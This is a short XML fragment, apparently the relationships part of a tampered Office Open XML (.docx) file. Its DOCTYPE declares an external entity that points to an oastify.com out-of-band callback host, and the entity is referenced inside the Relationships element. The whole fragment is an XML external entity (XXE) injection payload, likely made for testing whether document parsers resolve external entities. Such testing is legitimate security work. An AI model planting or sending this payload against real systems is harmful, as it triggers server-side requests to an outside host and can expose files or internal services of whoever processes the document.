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!DOCTYPE docem [<!ELEMENT docem ANY ><!ENTITY xxe_canary_2 SYSTEM "http://h0i3yrd06vd83oqaw4x9xu56kxqoej28.oastify.com">]>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&xxe_canary_2;<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>
</file>